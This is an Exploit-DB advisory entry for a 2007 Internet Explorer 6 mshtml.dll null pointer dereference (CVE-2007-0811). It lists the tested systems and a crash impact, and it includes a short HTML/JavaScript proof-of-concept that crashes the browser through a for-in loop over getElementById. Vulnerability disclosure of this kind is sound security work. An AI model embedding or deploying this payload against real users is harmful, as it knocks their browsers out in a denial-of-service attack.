Microsoft Internet Explorer 6 mshtml.dll Null Pointer Dereference Exploit

ID EDB-ID:3272
Type exploitdb
Reporter AmesianX
Modified 2007-02-05T00:00:00


MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit. CVE-2007-0811. Dos exploit for windows platform

+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)

+ Bug discovered & exploit coded by AmesianX in (YoungHo Park -

+ Critical: Critical
+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
                                          Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
                            Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
  The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
  Windows XP SP2 system. this bug will crash when executing a 'for' scripts.

+ The following proof-of-concept is also available:

<title> AmesianX, RC_No1 in (,</title>
<script language='javascript'>
var data = document['getElementById'];
for(var key in data);

# [2007-02-05]